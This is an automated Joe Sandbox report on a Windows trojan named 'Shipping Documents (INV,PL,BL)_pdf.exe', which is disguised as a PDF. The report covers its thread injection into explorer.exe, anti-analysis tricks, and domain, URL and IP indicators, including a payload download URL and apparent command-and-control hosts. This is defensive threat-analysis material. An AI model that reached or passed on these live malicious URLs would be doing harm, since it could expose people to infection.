      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320999 Sample: Shipping Documents (INV,PL,... Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 29 www.leepl.com 2->29 31 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 2->31 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 12 other signatures 2->47 11 Shipping Documents (INV,PL,BL)_pdf.exe 1 2->11         started        signatures3 process4 signatures5 57 Tries to detect Any.run 11->57 59 Hides threads from debuggers 11->59 14 Shipping Documents (INV,PL,BL)_pdf.exe 6 11->14         started        process6 dnsIp7 39 lifeandhealth.com.mx 192.185.170.106, 443, 49699 UNIFIEDLAYER-AS-1US United States 14->39 61 Modifies the context of a thread in another process (thread injection) 14->61 63 Tries to detect Any.run 14->63 65 Maps a DLL or memory area into another process 14->65 67 3 other signatures 14->67 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 33 www.iatlet.com 156.224.66.93, 49707, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->33 35 drinksandfruits.com 68.70.163.36, 49706, 80 NETSOURCEUS United States 18->35 37 www.drinksandfruits.com 18->37 49 System process connects to network (likely due to code injection or exploit) 18->49 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Shipping Documents (INV,PL,BL)_pdf.exe21%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      lifeandhealth.com.mx0%VirustotalBrowse
      drinksandfruits.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.smartbulk.store0%Avira URL Cloudsafe
      http://www.faithinfitness.net0%Avira URL Cloudsafe
      https://lifeandhealth.com.mx/)100%Avira URL Cloudmalware
      http://www.cannahavedessert.com/icm9/www.kalcio.site0%Avira URL Cloudsafe
      http://www.faithinfitness.net/icm9/0%Avira URL Cloudsafe
      http://www.nationalcanopies.com/icm9/www.cannahavedessert.com0%Avira URL Cloudsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.smartbulk.store/icm9/0%Avira URL Cloudsafe
      http://www.iatlet.comReferer:0%Avira URL Cloudsafe
      http://www.84streetchamber.comReferer:0%Avira URL Cloudsafe
      http://www.iatlet.com/icm9/www.leepl.com0%Avira URL Cloudsafe
      http://www.drinksandfruits.comReferer:0%Avira URL Cloudsafe
      http://www.leepl.com0%Avira URL Cloudsafe
      http://www.faithinfitness.netReferer:0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.iatlet.com/icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr0%Avira URL Cloudsafe
      http://www.nationalcanopies.com/icm9/0%Avira URL Cloudsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.faithinfitness.net/icm9/www.hunexhq.icu0%Avira URL Cloudsafe
      http://www.frontierautoglasswheatfield.com0%Avira URL Cloudsafe
      http://www.84streetchamber.com/icm9/0%Avira URL Cloudsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://www.images77.com/icm9/0%Avira URL Cloudsafe
      http://www.mademoisellepierre.com0%Avira URL Cloudsafe
      http://www.images77.com0%Avira URL Cloudsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://www.cannahavedessert.com/icm9/0%Avira URL Cloudsafe
      http://www.gcsisgreen.com/icm9/0%Avira URL Cloudsafe
      http://www.iatlet.com0%Avira URL Cloudsafe
      http://www.images77.comReferer:0%Avira URL Cloudsafe
      http://www.frontierautoglasswheatfield.com/icm9/0%Avira URL Cloudsafe
      http://www.84streetchamber.com0%Avira URL Cloudsafe
      http://www.gcsisgreen.com/icm9/www.smartbulk.store0%Avira URL Cloudsafe
      http://www.hunexhq.icu0%Avira URL Cloudsafe
      http://www.leepl.com/icm9/www.nationalcanopies.com0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.drinksandfruits.com/icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr0%Avira URL Cloudsafe
      http://www.machevate.com0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.com/icm9/0%Avira URL Cloudsafe
      http://www.hunexhq.icu/icm9/0%Avira URL Cloudsafe
      http://www.kalcio.site/icm9/www.mademoisellepierre.com0%Avira URL Cloudsafe
      http://www.drinksandfruits.com/icm9/0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net0%Avira URL Cloudsafe
      http://www.frontierautoglasswheatfield.comReferer:0%Avira URL Cloudsafe
      http://www.leepl.com/icm9/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.kalcio.siteReferer:0%Avira URL Cloudsafe
      http://www.mademoisellepierre.com/icm9/0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.machevate.com/icm9/0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.comReferer:0%Avira URL Cloudsafe
      http://www.gcsisgreen.comReferer:0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com0%Avira URL Cloudsafe
      http://www.kalcio.site0%Avira URL Cloudsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.images77.com/icm9/www.gcsisgreen.com0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.machevate.comReferer:0%Avira URL Cloudsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.mademoisellepierre.comReferer:0%Avira URL Cloudsafe
      http://www.drinksandfruits.com0%Avira URL Cloudsafe
      http://www.smartbulk.storeReferer:0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.cannahavedessert.com0%Avira URL Cloudsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lifeandhealth.com.mx
      		192.185.170.106
      		truefalseunknown
      HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
      		3.223.115.185
      		truefalse
        		high
        drinksandfruits.com
        		68.70.163.36
        		truetrueunknown
        www.iatlet.com
        		156.224.66.93
        		truetrue
          		unknown
          www.drinksandfruits.com
          		unknown
          		unknowntrue
            		unknown
            www.leepl.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.iatlet.com/icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVrtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.drinksandfruits.com/icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVrtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.smartbulk.storeexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.faithinfitness.netexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://lifeandhealth.com.mx/)Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://www.cannahavedessert.com/icm9/www.kalcio.siteexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.faithinfitness.net/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                		high
                http://www.nationalcanopies.com/icm9/www.cannahavedessert.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.smartbulk.store/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.iatlet.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.84streetchamber.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.iatlet.com/icm9/www.leepl.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.drinksandfruits.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.leepl.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://cert.int-x3.letsencrypt.org/0Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                  		high
                  http://www.faithinfitness.netReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.nationalcanopies.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.faithinfitness.net/icm9/www.hunexhq.icuexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.frontierautoglasswheatfield.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.84streetchamber.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cps.root-x1.letsencrypt.org0Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.images77.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mademoisellepierre.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.images77.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cps.letsencrypt.org0Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.cannahavedessert.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.gcsisgreen.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.iatlet.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.images77.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.frontierautoglasswheatfield.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.84streetchamber.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.gcsisgreen.com/icm9/www.smartbulk.storeexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hunexhq.icuexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.leepl.com/icm9/www.nationalcanopies.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.carterandcone.comlexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                    		high
                    http://www.machevate.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.verifyinstagram-help.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hunexhq.icu/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kalcio.site/icm9/www.mademoisellepierre.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.drinksandfruits.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.verifyinstagram-help.com/icm9/www.faithinfitness.netexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.frontierautoglasswheatfield.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                      		high
                      http://www.leepl.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.kalcio.siteReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.mademoisellepierre.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.machevate.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.verifyinstagram-help.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.gcsisgreen.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.goodfont.co.krexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.84streetchamber.com/icm9/www.verifyinstagram-help.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.kalcio.siteexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.typography.netDexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.images77.com/icm9/www.gcsisgreen.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.machevate.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://fontfabrik.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.mademoisellepierre.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.drinksandfruits.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.smartbulk.storeReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fonts.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.cannahavedessert.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sakkal.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.nationalcanopies.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://lifeandhealth.com.mx/xShipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.kalcio.site/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mademoisellepierre.com/icm9/www.images77.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.leepl.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cannahavedessert.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ocsp.int-x3.letsencrypt.org0/Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.verifyinstagram-help.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bindShipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.nationalcanopies.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hunexhq.icu/icm9/www.frontierautoglasswheatfield.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.gcsisgreen.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.frontierautoglasswheatfield.com/icm9/Mexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.machevate.com/icm9/www.84streetchamber.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.drinksandfruits.com/icm9/www.iatlet.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.smartbulk.store/icm9/www.machevate.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.hunexhq.icuReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.iatlet.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    68.70.163.36
                                    		unknownUnited States
                                    		22458NETSOURCEUStrue
                                    156.224.66.93
                                    		unknownSeychelles
                                    		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                    192.185.170.106
                                    		unknownUnited States
                                    		46606UNIFIEDLAYER-AS-1USfalse

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:320999
                                    Start date:20.11.2020
                                    Start time:08:52:42
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Shipping Documents (INV,PL,BL)_pdf.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/0@4/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 52.7% (good quality ratio 45.8%)
                                    • Quality average: 71.4%
                                    • Quality standard deviation: 33.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 231
                                    • Number of non-executed functions: 34
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                    • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.139.144, 92.122.144.200, 52.147.198.201, 13.88.21.125
